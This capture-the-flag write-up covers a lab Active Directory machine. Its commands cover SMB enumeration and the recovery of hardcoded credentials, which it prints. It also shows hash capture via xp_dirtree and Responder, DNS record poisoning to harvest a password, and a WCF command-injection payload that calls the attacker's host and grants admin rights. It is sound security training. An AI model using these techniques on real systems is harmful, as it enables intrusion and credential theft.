Overwatch is a medium-difficulty Windows Active Directory machine that requires careful enumeration and analysis across multiple layers of the environment. Progression depends on identifying weaknesses in custom applications, leveraging misconfiguration in enterprise services, and pivoting through internal components to achieve full domain compromise.
We kick things off with an nmap scan.
sudo nmap -sVC --min-rate 1000 10.129.1.x -p-
Nmap scan report for 10.129.1.x
Host is up (0.29s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-18 17:43:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-02-18T17:44:59+00:00
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after: 2026-06-08T15:16:06
|_ssl-date: 2026-02-18T17:45:40+00:00; -5h29m57s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2026-02-18T17:45:41+00:00; -5h29m56s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-02-18T17:40:21
|_Not valid after: 2056-02-18T17:40:21
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
62157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
62158/tcp open msrpc Microsoft Windows RPC
64717/tcp open msrpc Microsoft Windows RPC
64745/tcp open tcpwrapped
64788/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=2/19%Time=699647B0%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -5h29m56s, deviation: 0s, median: -5h29m57s
| smb2-time:
| date: 2026-02-18T17:44:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 404.62 seconds
The scan reveals crucial information about the machine:
overwatch and the computer name is S200401.We know the server has SMB running due to the 2 open ports: 445 (Modern implementation for SMB over TCP/IP) and 139
netbios-ssn(NetBIOS Session Service used to support older implementations of SMB over NetBIOS).
Before proceeding any further, it is imperative we add the hostnames to /etc/hosts for name resolution.
echo "10.129.1.x S200401.overwatch.htb overwatch.htb" | sudo tee -a /etc/hosts
Next, we fix the clock skew.
sudo ntpdate overwatch.htb
Listing the SMB shares on the machine reveals an unprotected software$ share.
smbclient -L overwatch.htb -U guest
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
software$ Disk
SYSVOL Disk Logon server share
smbclient can also be used to browse through the share.
smbclient '\\overwatch.htb\software$' -U guest
Try "help" to get a list of possible commands.
smb: \> ls
. DH 0 Sat May 17 06:57:07 2025
.. DHS 0 Thu Jan 1 12:16:47 2026
Monitoring DH 0 Sat May 17 07:02:43 2025
cd Mon
7147007 blocks of size 4096. 1831880 blocks available
smb: \> cd Monitoring
smb: \Monitoring\> ls
. DH 0 Sat May 17 07:02:43 2025
.. DH 0 Sat May 17 06:57:07 2025
EntityFramework.dll AH 4991352 Fri Apr 17 02:08:42 2020
EntityFramework.SqlServer.dll AH 591752 Fri Apr 17 02:08:56 2020
EntityFramework.SqlServer.xml AH 163193 Fri Apr 17 02:08:56 2020
EntityFramework.xml AH 3738289 Fri Apr 17 02:08:40 2020
Microsoft.Management.Infrastructure.dll AH 36864 Mon Jul 17 20:16:10 2017
overwatch.exe AH 9728 Sat May 17 06:49:24 2025
overwatch.exe.config AH 2163 Sat May 17 06:32:30 2025
overwatch.pdb AH 30208 Sat May 17 06:49:24 2025
System.Data.SQLite.dll AH 450232 Mon Sep 30 02:11:18 2024
System.Data.SQLite.EF6.dll AH 206520 Mon Sep 30 02:10:06 2024
System.Data.SQLite.Linq.dll AH 206520 Mon Sep 30 02:10:42 2024
System.Data.SQLite.xml AH 1245480 Sun Sep 29 00:18:00 2024
System.Management.Automation.dll AH 360448 Mon Jul 17 20:16:10 2017
System.Management.Automation.xml AH 7145771 Mon Jul 17 20:16:10 2017
x64 DH 0 Sat May 17 07:02:33 2025
x86 DH 0 Sat May 17 07:02:33 2025
7147007 blocks of size 4096. 1831880 blocks available
The Monitoring folder contains library and configuration files for overwatch.exe which seems to be .NET software developed in-house. We go on to download all the files within this folder.
smb: \Monitoring\> prompt OFF; mget *
We could have just downloaded
overwatch.exe,overwatch.exe.configand overwatch.pdb` as the rest of the files are standard windows files.
Examining overwatch.exe.config reveals an internal Monitoring Service running on overwatch.htb with an API hosted at http://overwatch.htb:8000/MonitorService. It also contains the PublicKeyToken.
less overwatch.exe.config
To examine the overwatch.exe file to search for potential hardcoded credentials, we use ilspycmd.
ilspycmd overwatch.exe > output
As anticipated, the output reveals the password to sqlsvc.
We also find a public string KillProcess(string ProcessName) function that has command injection. (This might come in handy later on)
The access that the sqlsvc account has can be checked using netexec.
nxc ldap overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv'
LDAP 10.129.3.x 389 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.3.x 389 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
nxc winrm overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv'
WINRM 10.129.3.x 5985 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
WINRM 10.129.3.x 5985 S200401 [-] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
Apparently, sqlsvc has access to LDAP access but not WinRM.
Earlier, the nmap scan revealed an MS-SQL server running on port 6520 and decompiling the overwatch.exe file exposed the credentials of the sqlsvc account.
We connect as sqlsvc using mssqlclient.py.
mssqlclient.py sqlsvc:'TI0LKcfHzZw1Vv'@overwatch.htb -windows-auth -p 6520
Running basic commands reveal that we are not able to use xp_cmdshell but can use xp_dirtree. We also find a linked server: SQL07.
SQL (OVERWATCH\sqlsvc guest@master)> xp_dirtree
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
$WinREAgent 1 0
<Truncated />
SQL (OVERWATCH\sqlsvc guest@master)> xp_cmdshell whoami
ERROR(S200401\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (OVERWATCH\sqlsvc guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
SQL (OVERWATCH\sqlsvc guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
---------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 1 1 0 0 0 0 0 0 0
BUILTIN\Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
OVERWATCH\sqlsvc WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
SQL (OVERWATCH\sqlsvc guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
------------------ ---------------- ----------- ------------------ ------------------ ------------ -------
S200401\SQLEXPRESS SQLNCLI SQL Server S200401\SQLEXPRESS NULL NULL NULL
SQL07 SQLNCLI SQL Server SQL07 NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
------------- ----------- --------------- ------------
Next, we try to capture the hash using Responder through xp_dirtree.
Fire up Responder.
sudo Responder -I tun0
And, connect to our machine using the mssqlclient's xp_dirtree command.
SQL (OVERWATCH\sqlsvc guest@master)> xp_dirtree \\10.10.16.x\toshith
We obtain the hash of the S200401 machine account through Responder.
Next, we try using the linked server found earlier.
SQL (OVERWATCH\sqlsvc guest@master)> use_link sql07
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "sql07" returned message "Login timeout expired".
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "sql07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64].
This gives a network error. We check the data source of SQL07 which could reveal IP address or domain.
SQL (OVERWATCH\sqlsvc guest@master)> SELECT name, data_source FROM sys.servers WHERE name = 'sql07'
name data_source
----- -----------
SQL07 SQL07
Apparently, the IP address is not specified and it uses just the Domain name to connect to the server.
We can check the machine's dns records using bloodyAD to check for the linked server as we had LDAP access as sqlsvc.
bloodyAD --host overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv' get dnsDump
The records do not show any entry for SQL07.
Checking for the permissions the sqlsvc account has, we find we can add a DNS record.
bloodyAD --host overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD
distinguishedName: DC=SQL07,DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD
We use bllodyAD itself to add the DNS record pointing to our IP address for SQL07.
bloodyAD --host overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv' add dnsRecord SQL07 10.10.16.x
And finally, we make the MS-SQL server authenticate to Responder running on our machine.
SQL (OVERWATCH\sqlsvc guest@master)> use_link sql07
This reveals the clear text password for sqlmgmt.
We check for access that the newly discovered sqlmgmt account has, and discover that WinRM is accessible.
nxc winrm overwatch.htb -u sqlmgmt -p '...'
WINRM 10.129.3.4 5985 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
WINRM 10.129.3.4 5985 S200401 [+] overwatch.htb\sqlmgmt:bIhBbzMMnB82yx (Pwn3d!)
We connect to the machine as sqlmgmt using evil-wirm.
evil-winrm -i overwatch.htb -u sqlmgmt -p '...'
The user flag can be found in the Desktop directory.
Moving forward, we check the URL that was listed in the overwatch.exe.config file.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> curl -UseBasicParsing 'http://overwatch.htb:8000/MonitorService'
StatusCode : 200
StatusDescription : OK
Content : <HTML lang="en"><HEAD><link rel="alternate" type="text/xml"
href="http://overwatch.htb:8000/MonitorService?disco"/><STYLE type="text/css">#content{ FONT-SIZE:
0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: ...
RawContent : HTTP/1.1 200 OK
Content-Length: 3077
Content-Type: text/html; charset=UTF-8
Date: Wed, 01 May 2026 14:45:20 GMT
Server: Microsoft-HTTPAPI/2.0
<HTML lang="en"><HEAD><link rel="alternate" type="t...
From the config file, we get an idea that MonitoringService uses WCF Framework
To verify, we check if the service responds to the wsdl parameter.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> curl -UseBasicParsing 'http://overwatch.htb:8000/MonitorService?wsdl'
StatusCode : 200
StatusDescription : OK
Content : <?xml version="1.0" encoding="utf-8"?><wsdl:definitions name="MonitoringService"
targetNamespace="http://tempuri.org/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns:wsx="http://schemas.xmlsoap.o...
RawContent : HTTP/1.1 200 OK
Content-Length: 4478
Content-Type: text/xml; charset=UTF-8
Date: Wed, 01 May 2026 14:51:29 GMT
Server: Microsoft-HTTPAPI/2.0
<?xml version="1.0" encoding="utf-8"?><wsdl:definiti...
....
We can get more info about the parameters that can be used through this page.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $(curl -UseBasicParsing 'http://overwatch.htb:8000/MonitorService?wsdl').RawContent
Note the parameter KillProcess, we had earlier found, how this was vulnerable to command injection.
To use this WCF process and exploit it, we first register it as a WebServiceProxy.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $client = New-WebServiceProxy -Uri 'http://overwatch.htb:8000/MonitorService?wsdl' -Namespace "
WcfProxy"
To make sure everything works, we first start a python http server (python3 -m http.server) on our machine then try curl to get a hit on it from the windows machine.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $client.KillProcess("x;curl -UseBasicParsing http://10.10.16.x:8000/test;")
Error:
Error response
Error response
Error code: 404
Message: File not found.
Error code explanation: 404 - Nothing matches the given URI.
And indeed, the command injection worked.
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.8.x - - [01/Jun/2026 20:48:34] code 404, message File not found
10.129.8.x - - [01/Jun/2026 20:48:34] "GET /test HTTP/1.1" 404 -
Since this is a privileged process, we can simply add the sqlmgmt user to local admins using this vulnerability.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $client.KillProcess("x;net localgroup administrators sqlmgmt /add;")
Error: The term '-Force' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
sqlmgmt
The command completed successfully.
And Viola! we have Administrator privileges on this machine.
We can restart the winrm session to read the flag.
This concludes the Overwatch machine.